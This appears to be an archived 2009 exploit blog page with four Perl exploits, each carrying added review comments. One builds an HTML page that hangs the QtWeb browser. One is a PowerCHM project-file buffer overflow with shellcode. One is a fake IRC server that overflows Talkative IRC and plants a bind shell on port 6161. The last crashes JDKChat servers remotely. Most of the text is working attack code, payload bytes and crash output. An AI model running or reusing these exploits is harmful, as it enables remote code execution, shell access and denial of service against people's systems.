31 March, 2009

QtWeb Internet Browser 2.0 (build 043) Remote Denial of Service Exploit (smile)

###################################################################################
#
# QtWeb Internet Browser 2.0 (build 043) Remote Denial of Service Exploit (smile)
#
# Summary: QtWeb is a compact, portable and secure web browser with some unique UI
# and privacy features. QtWeb is an open source project based on Nokia's Qt framework
# (former Trolltech) and Apple's WebKit rendering engine (the same as being used in
# Apple Safari and Google Chrome).
#
# Happy Exploit.
#
# Product web page: http://www.qtweb.net/
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 01.04.2009
#
###################################################################################

# The generated page is built from five fragments ($S $M $I $L $E) that are
# simply concatenated before being written out; $S and $M are the first two.
# The markup is written here as plain text instead of \x-escaped bytes so the
# output can be read directly: an alert(), a doz() helper that calls the
# browser's sidebar/favourites API, and (in $L) a confirm() that gates an
# unbounded loop over doz(). The JS '\n' / '\t' escapes inside the alert()
# text are literal backslash sequences in the output, hence the '\\' here.
$S = "<html>\r\n"
   . "<title>QtWeb Internet Browser 2.0 (build 043) Remote Denial of Service Exploit</Title>\r\n"
   . "<head><body><script type=\"text/javascript\">\r\n"
   . "alert(\"QtWeb Internet Browser 2.0 (build 043) Remote Denial of Service Exploit"
   . "\\n\\n\\t\\t\\tby LiquidWorm (c) 2009\");\r\n"
   . "function doz() {\r\n"
   . "title=\"Hot Ice\";\r\n"
   . "url=\"http://www.milw0rm.com/\";\r\n"
   . "if (window.sideb";

# Continues mid-identifier ("window.sideb" + "ar"): the split points between
# fragments are arbitrary; they only make sense once joined.
$M = "ar) {\r\n"
   . "window.sidebar.addPanel(title, url,\"\");\r\n"
   . "} els";




# Third fragment: the window.external branch of doz(), again cut mid-word at
# both ends ("els" + "e if(" ... "window.opera " + "&&").
$I = "e if( window.external ) {\r\n"
   . "window.external.AddFavorite( url, title);\r\n"
   . "} else if(window.opera ";
####################


# Fourth fragment: the last branch of doz(), then the confirm() prompt and the
# loop that causes the hang. "x<x+1" effectively never becomes false, so after
# OK is pressed doz() is called without end; "No" only redirects to qtweb.net.
# The '\\n' keeps the literal backslash-n of the confirm() text.
$L = "&& window.print) { \r\n"
   . "return (true); }}\r\n"
   . "var ask = confirm(\"Press OK to start the DoS.\\nPress No to dodge the DoS.\");\r\n"
   . "if (ask == true) { \r\n"
   . "for (x=0; x<x+1; x++) doz();\r\n"
   . "} else\t{ alert(\"Ok :(\");\r\n"
   . "window.location.href = \"http://www.qtweb.net/\";";
#########
# Closing fragment: closes the else branch of $L and the document.
$E = "\r\n} </script></body></head></html>";

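# Join the five fragments and write them to ./Smile.html in the current
# directory. Three-arg open with a lexical handle keeps the mode separate from
# the file name (a two-arg ">./$file" relies on the name not starting with a
# mode character), and close is checked because buffered write errors only
# surface there. No binmode, as in the original, so on Windows "\n" inside the
# fragments is written as CRLF exactly as before.
my $file = "Smile.html";
my $fun  = $S . $M . $I . $L . $E;
open my $out, '>', "./$file" or die "\nMffff... $!\n";
print {$out} $fun or die "\nMffff... write failed: $!\n";
close $out or die "\nMffff... $!\n";
print "\n[+] File $file created with funny potion!\n\n";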



http://www.zeroscience.org/codes/qtweb_dos.txt

29 March, 2009

Waldorf & Statler

PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit

--------------------------
#!/usr/bin/perl
#
# Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
#
# Summary: With PowerCHM you can create your CHM files
# automatically from Html Files (including .htm, .html
# and .mht), Text Files (.txt), Microsoft Word Documents
# (.doc) and Adobe Acrobat Document (.pdf).
#
# Product web page: http://www.dawningsoft.com/products/powerchm.htm
#
# Tested on WinXP Pro SP2 (English)
#
# Refs: http://www.milw0rm.com/exploits/8300
# http://security.biks.vn/?p=365
#
# Exploit by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 28.03.2009
#

# The .hhp project text. The original wrote each line with an embedded newline
# AND a "\n" escape, so every line is followed by a blank one (and the two
# "\n\n" lines by two); the blank lines below reproduce that byte for byte.
my $header = <<"HHP";

[OPTIONS]

Compatibility=1.1 or later

Compiled file=zero.chm

Contents file=science.hhc

Index file=lqwrm.hhk

Binary Index=Yes

Language=0x042F

Title=

Error log file=Errlog.txt

Default Window=main


[WINDOWS]

main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0


[FILES]


[INFOTYPES]

HHP


# Hand-written x86 stub, 32 bytes. Reading the opcodes: it stores the bytes
# 0x63 0x6D 0x64 ("cmd") on the stack, loads the absolute address 0x77BF93C7
# into EAX (B8 imm32) and calls through it (FF D0). A hard-coded address like
# this is tied to the one Windows build named in the header ("Tested on WinXP
# Pro SP2 (English)") and will generally not resolve to the same code
# elsewhere. NOTE(review): nothing in the file says which API lives at that
# address; do not document it as a specific function without confirming.
my $sc ="\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";


# Overflow payload. 'x' binds tighter than '.', so this is, in order:
#   568 x 0x90 | $sc (32) | 400 x 'A' | "\xe8\xed\x12\x00" | 500 x 'B'
# i.e. 1504 bytes. The 4-byte field reads as little-endian 0x0012EDE8 —
# presumably the stack address the overwritten control value is pointed at
# (confirm in a debugger; the file does not say).
my $bof = "\x90" x 568 . "$sc" . "\x41" x 400 . "\xe8\xed\x12\x00" . "\x42" x 500;

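# Write the project file. Three-arg open with a lexical handle keeps the mode
# separate from the name (a two-arg ">./$file" relies on the name never
# starting with a mode character), and close is checked because buffered write
# errors only surface there. No binmode, as in the original, so on Windows the
# "\n" bytes in $header are written as CRLF exactly as before.
my $file = "Watchmen.hhp";
open my $out, '>', "./$file" or die "\nCan't open $file: $!";
print {$out} $header . $bof or die "\nCan't write $file: $!";
close $out or die "\nCan't close $file: $!";
sleep 1;
print "\nFile $file successfully created!\n";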



http://www.milw0rm.com/exploits/8301

16 March, 2009

Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)

=========================================================
#!/usr/bin/perl
#
# Title: Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)
#
# Summary: The easiest and fastest way to meet people online. With Talkative IRC you can
# chat with thousands of people at the same time. Find people with the same interests as you.
# Join channels where you can meet people speaking your language, or start your own. No
# monthly fees or other hassle, just a download and a click. Version 0.4.4.16 makes nick list
# font customizable. Why Talkative? Mainly because it's secure, stable and easy to use.
#
# Product web page: http://www.talkative-irc.com/
#
# Desc: Talkative IRC 0.4.4.16 suffers from a stack based buffer overflow vulnerability that enables us
# to gain full control over the application and execute arbitrary commands. The ECX and EIP registers get
# overwritten, and so does the SEH.
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Ref: http://www.milw0rm.com/exploits/6654
#
#
#---------------------------------------------windbg output--------------------------------------------------
#
# (398.ca4): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=0013f0d0 edx=00000008 esi=00000000 edi=00421c40
# eip=004d8260 esp=0013f08c ebp=0013f1c4 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0xd8260:
# 004d8260 8b40f0 mov eax,dword ptr [eax-10h] ds:0023:41414131=????????
# 0:000> g
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=42424242 edx=7c9037d8 esi=00000000 edi=00000000
# eip=42424242 esp=0013ecbc ebp=0013ecdc iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 42424242 ?? ???
#
#---------------------------------------------windbg output--------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# http://www.zeroscience.org/
#
# liquidworm {z} gmail {z} com
#
# 17.03.2009
#

use IO::Socket;

# Fake IRC server that delivers the overflow: listens once on localhost:6667,
# accepts a single client, greets it with a 001 numeric and then sends one
# oversized line. Returns after that second print; the caller (the while loop
# below) calls it again immediately, so the port is re-bound per connection.
sub start_zerver()
{
# NOTE(review): indirect-object syntax; IO::Socket::INET->new(...) is the
# unambiguous form. LocalAddr 'localhost' binds the loopback interface only.
my $sock = new IO::Socket::INET(
Listen => 1,
LocalAddr => 'localhost',
LocalPort => 6667,
Proto => 'tcp'
);
# A bare die reports only "Died at ..."; the bind/listen reason is in $@ / $!.
die unless $sock;

header();

print "\n [*] Evil IRC Server started on port 6667\n";

# Blocks until one client connects; there is no timeout.
my $wire = $sock -> accept();

# Payload pieces, in the order the final print sends them: 272 x 'A', a 4-byte
# "next SEH" field, a 4-byte SEH address, 25 NOPs, the shellcode, 10 NOPs.
# The address is taken from kernel32.dll on the build named in the header
# ("Tested on ... XP Professional SP2 (English)") and is not valid elsewhere.
my $junky = "A" x 272;
my $next_seh = "\xeb\x06\x90\x90";
my $seh = "\x9a\x72\x85\x7c"; #0x7C85729A pop pop ret kernel32.dll
my $nop_start = "\x90" x 25;
my $nop_end = "\x90" x 10;

# win32_bind - EXITFUNC=seh LPORT=6161 Size=709 Encoder=PexAlphaNum http://metasploit.com
# Generator output copied verbatim (per the line above): a bind shell on TCP
# 6161. Apart from the short stub at the start, the bytes fall in the printable
# 0x30-0x5a range, which is what the encoder name suggests.
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58".
"\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x54\x4e\x33\x4b\x58\x4e\x37".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x52\x4a\x42\x45\x37\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
"\x4b\x48\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x48".
"\x49\x58\x4e\x36\x46\x32\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d".
"\x46\x36\x4b\x38\x43\x54\x42\x43\x4b\x38\x42\x54\x4e\x30\x4b\x58".
"\x42\x57\x4e\x41\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x35\x4a\x56".
"\x50\x48\x50\x54\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56".
"\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x37\x43\x47".
"\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x33\x42\x35\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
"\x48\x46\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x56\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x55\x43\x45\x43\x45\x43\x34".
"\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x4a\x51".
"\x41\x51\x48\x46\x43\x55\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a".
"\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x36\x42\x31".
"\x41\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x42".
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x35\x4f\x4f\x48\x4d".
"\x42\x55\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x35".
"\x4f\x4f\x42\x4d\x48\x36\x4c\x56\x46\x56\x48\x46\x4a\x36\x43\x36".
"\x4d\x56\x49\x48\x45\x4e\x4c\x56\x42\x35\x49\x45\x49\x42\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x53\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x52".
"\x43\x59\x4d\x48\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
"\x44\x37\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x34\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x56".
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x46".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f".
"\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d".
"\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x45\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

print " [*] Throwing payload...\r\n";

# Shaped like an RPL_WELCOME (001) line, presumably so the client treats the
# connection as registered before the next message arrives.
print $wire ":irc_server.stuff 001 jox :Welcome to the Internet Relay Network jox\r\n";

sleep(1);

# The oversized line: a ":" prefix followed by roughly 1 KiB of the pieces
# above, then a PRIVMSG. On the wire this is a server-originated message whose
# prefix is hundreds of identical bytes — easy to tell apart from real IRC
# traffic. NOTE(review): the writes to $wire are not checked, and $wire/$sock
# are only closed when they go out of scope at the end of the sub.
print $wire ":" . "$junky" . "$next_seh" . "$seh" . "$nop_start" . "$shellcode" . "$nop_end" . " PRIVMSG t00t : /FINGER w00t.\r\n";
}

# Serve forever: each pass waits for one client, sends, and goes back to
# listening. There is no exit condition (stop with Ctrl-C), and nothing here
# checks the outcome — the two status lines print unconditionally once
# start_zerver() returns.
while (1) {
    start_zerver();
    print " [*] Talkative IRC client successfully exploited!\r\n\n",
          " [**] Check shell on port 6161! [**]\r\n";
}

# Print the banner: a blank line, a rule of 80 tildes, two title lines, a blank
# line, the rule again and two newlines. Output only; returns print's status.
sub header()
{
    my $rule = "~" x 80;
    print "\n", $rule, "\n",
          " Talkative IRC v0.4.4.16 Remote Stack Overflow Exploit (SEH)\n",
          " by LiquidWorm (c) 2009\n\n",
          $rule, "\n\n";
}

=========================================================






http://zeroscience.org/codes/talkirc_seh.txt
http://www.destr0y.net/showthread.php?t=926

11 March, 2009

JDKChat v1.5 Remote Integer Overflow PoC

--------------------------------------------------------
#!/usr/bin/perl
#
# Title: JDKChat v1.5 Remote Integer Overflow PoC
#
# Summary: JDKChat is a simple C++ chat server for GNU/Linux systems.
# Users can connect to it through a simple tcp client like telnet.
#
# WebSite : http://www.jdkoftinoff.com/
#
# ---------------------------- Demo ---------------------------------
# aleks@tux ~ $ telnet 192.168.0.1 7777
# Trying 192.168.0.1...
# Connected to 192.168.0.1.
# Escape character is '^]'.
# Welcome To jdkchat v1.5 by J.D. Koftinoff Software, Ltd.
# http://www.jdkoftinoff.com/
# and modified by Aditya Godbole (urwithaditya@gmx.net)
# Commands available:
# /who -- (list all users along with their connection numbers)
# /exit -- (exit chat room)
# /local -- (toggle local mode for your telnet session)
# /[connection number] message -- (send private message to user at
# specified connection number)
#
#
# JDKCHAT: Aleks just entered the room.
# JDKCHAT: Users = Aleks:0
# Aleks >
#
#
# // And after we run the PoC :
#
# JDKCHAT: PwNzOr just entered the room.
# Aleks >Connection closed by foreign host.
# aleks@tux ~ $
#
# ---------------------------- /Demo --------------------------------
#
#
# Vulnerability discovered by n3tpr0b3 & LiquidWorm
#
# n3tpr0b3 [AT] gmail [.] com
#
# 12.03.2009
#

use IO::Socket;

# Usage check: exactly two positional arguments (server IP, server port).
if ($#ARGV != 1) {
print "
JDKChat v1.5 Remote Integer Overflow PoC By n3tpr0b3
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Usage : jdkchat_poc.pl SrvIP SrvPort #
# Greetz to LiquidWorm #
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n";
exit;
}

# NOTE(review): indirect-object syntax; IO::Socket::INET->new(...) is the
# unambiguous form. The "$ARGV[n]" quoting is a no-op stringification.
my $dupsa = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp"
)
or die "Could not connect to $ARGV[0]: $!\n";

sleep 1;
# Bytes decode to "PwNzOr\r" — the name the Demo transcript above shows
# entering the room.
print $dupsa "\x50\x77\x4e\x7a\x4f\x72\x0d";
print "#--> Loged on t3h JDKChat server...\n";
sleep 1;
print "#--> Sending our evil command... \n";
sleep 2;
# Bytes decode to "/-1\r": the server's "/[connection number] message" command
# with a negative number, after which the Demo transcript shows the other
# client's session being closed. The script never reads a reply, so the
# "pwned" line below is printed unconditionally. NOTE(review): the writes and
# the close are unchecked.
print $dupsa "\x2f\x2d\x31\x0d";
close($dupsa);
print "#--> Server pwned... \n";

-------------------------------------------------------



http://zeroscience.org/codes/jdkchat_poc.txt